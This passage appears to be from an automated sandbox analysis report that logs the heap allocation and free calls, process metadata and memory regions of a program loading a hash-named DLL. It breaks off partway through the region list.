[0288.709] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x223b200 [0288.850] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x224e410 [0288.850] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2270080 [0288.852] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2283290 [0288.852] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22964a0 [0288.853] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22a96b0 [0288.853] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22bc8c0 [0288.853] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22cfad0 [0288.854] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22e2ce0 [0288.854] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22f5ef0 [0288.855] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2309100 [0288.855] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x231c310 [0288.856] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x232f520 [0288.856] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2342730 [0288.857] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2355940 [0288.857] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2368b50 [0288.857] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x237bd60 [0288.858] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x238ef70 [0288.858] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23a2180 [0288.859] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2f0) returned 0x55a840 [0288.859] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55c460 | out: hHeap=0x550000) returned 1 [0288.859] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23b5390 [0288.859] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23c85a0 [0288.860] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23db7b0 [0288.860] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23ee9c0 [0288.861] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2401bd0 [0288.861] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2414de0 [0288.861] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2427ff0 [0288.863] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x243b200 [0288.863] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x244e410 [0288.864] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2461620 [0288.864] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2474830 [0288.864] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2487a40 [0288.865] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x249ac50 [0288.865] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24ade60 [0288.866] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24c1070 [0288.866] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24d4280 [0288.866] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24e7490 [0288.867] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24fa6a0 [0288.867] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x250d8b0 [0288.868] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2520ac0 [0288.868] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2533cd0 [0288.869] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2546ee0 [0288.869] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x255a0f0 [0288.869] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x256d300 [0288.870] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2580510 [0288.870] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2593720 [0288.871] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25a6930 [0288.871] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25b9b40 [0288.872] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25ccd50 [0288.872] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25dff60 [0288.872] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25f3170 [0288.873] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x468) returned 0x568b70 [0288.873] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55a840 | out: hHeap=0x550000) returned 1 [0288.873] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2606380 [0288.874] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2619590 [0288.874] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x262c7a0 [0288.875] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x263f9b0 [0288.875] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2652bc0 [0288.875] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2670080 [0288.877] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2683290 [0288.877] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26964a0 [0288.878] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26a96b0 [0288.878] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26bc8c0 [0288.878] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26cfad0 [0288.879] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26e2ce0 [0288.879] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26f5ef0 [0288.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2709100 [0288.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x271c310 [0288.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x272f520 [0288.881] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2742730 [0288.881] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2755940 [0288.882] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2768b50 [0288.882] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x277bd60 [0288.883] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x278ef70 [0288.883] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27a2180 [0288.884] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27b5390 [0288.884] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27c85a0 [0288.884] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27db7b0 [0288.885] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27ee9c0 [0288.885] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2801bd0 [0288.885] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2814de0 [0289.024] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2827ff0 [0289.024] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x283b200 [0289.024] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x284e410 [0289.025] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2861620 [0289.025] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2874830 [0289.026] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2887a40 [0289.026] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x289ac50 [0289.027] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28ade60 [0289.027] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28c1070 [0289.027] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28d4280 [0289.028] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28e7490 [0289.028] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28fa6a0 [0289.029] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x290d8b0 [0289.029] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2920ac0 [0289.030] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2933cd0 [0289.030] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2946ee0 [0289.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x295a0f0 [0289.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x296d300 [0289.032] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2980510 [0289.032] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x698) returned 0x568fe0 [0289.032] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0289.032] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2993720 [0289.032] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29a6930 [0289.033] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29b9b40 [0289.033] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29ccd50 [0289.033] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29dff60 [0289.034] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29f3170 [0289.034] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a06380 [0289.035] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a19590 [0289.037] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a2c7a0 [0289.037] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a3f9b0 [0289.038] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a52bc0 [0289.038] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a65dd0 [0289.038] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a78fe0 [0289.039] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a8c1f0 [0289.039] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a9f400 [0289.040] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ab2610 [0289.040] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ac5820 [0289.041] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ad8a30 [0289.041] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2aebc40 [0289.042] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2afee50 [0289.042] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b12060 [0289.042] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b25270 [0289.043] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b38480 [0289.043] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b4b690 [0289.044] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b5e8a0 [0289.044] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b71ab0 [0289.044] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b84cc0 [0289.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b97ed0 [0289.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bab0e0 [0289.046] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bbe2f0 [0289.046] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bd1500 [0289.047] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2be4710 [0289.047] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bf7920 [0289.048] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c0ab30 [0289.048] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c1dd40 [0289.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c30f50 [0289.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c44160 [0289.050] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c57370 [0289.050] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c6a580 [0289.051] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c7d790 [0289.051] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c909a0 [0289.052] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ca3bb0 [0289.052] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cb6dc0 [0289.053] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cc9fd0 [0289.053] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cdd1e0 [0289.053] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cf03f0 [0289.054] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d03600 [0289.054] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d16810 [0289.055] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d29a20 [0289.055] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d3cc30 [0289.055] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d4fe40 [0289.056] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d63050 [0289.056] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d76260 [0289.057] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d89470 [0289.057] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d9c680 [0289.057] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2daf890 [0289.058] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2dc2aa0 [0289.058] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2dd5cb0 [0289.059] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2de8ec0 [0289.148] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2dfc0d0 [0289.149] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e0f2e0 [0289.150] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e224f0 [0289.150] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e35700 [0289.150] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e48910 [0289.151] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e70080 [0289.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e83290 [0289.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e964a0 [0289.183] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ea96b0 [0289.184] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ebc8c0 [0289.184] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ecfad0 [0289.185] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9e0) returned 0x57d060 [0289.185] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568fe0 | out: hHeap=0x550000) returned 1 [0289.185] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ee2ce0 [0289.186] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ef5ef0 [0289.186] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f09100 [0289.187] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f1c310 [0289.187] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f2f520 [0289.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f42730 [0289.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f55940 [0289.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f68b50 [0289.189] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f7bd60 [0289.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f8ef70 [0289.190] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fa2180 [0289.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fb5390 [0289.191] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fc85a0 [0289.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fdb7b0 [0289.192] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fee9c0 [0289.324] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57d060 | out: hHeap=0x550000) returned 1 [0295.473] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x587ef0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5a7cf0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5baf00 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5ce110 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5e1320 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5f4530 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x607740 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x61a950 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x62db60 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f70080 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f83290 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f964a0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1fa96b0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1fbc8c0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1fcfad0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1fe2ce0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ff5ef0 | out: hHeap=0x550000) returned 1 [0295.474] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2009100 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x201c310 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x202f520 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2042730 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2070080 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2083290 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20964a0 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20a96b0 | out: hHeap=0x550000) returned 1 [0295.475] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20bc8c0 | out: hHeap=0x550000) returned 1 [0295.740] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20cfad0 | out: hHeap=0x550000) returned 1 [0295.741] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20e2ce0 | out: hHeap=0x550000) returned 1 [0295.741] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20f5ef0 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2109100 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x211c310 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x212f520 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2142730 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2155940 | out: hHeap=0x550000) returned 1 [0295.742] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2168b50 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x217bd60 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x218ef70 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21a2180 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21b5390 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21c85a0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21db7b0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21ee9c0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2201bd0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2214de0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2227ff0 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x223b200 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x224e410 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2270080 | out: hHeap=0x550000) returned 1 [0295.747] HeapFree (hHeap=0x550000, dwFlags=0x0, lpMem=0x2283290) Thread: id = 235 os_tid = 0x11c0 Process: id = "36" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x4b387000" os_pid = "0x438" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18018 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18019 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18020 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 18021 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 18022 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 18023 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 18024 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18025 start_va = 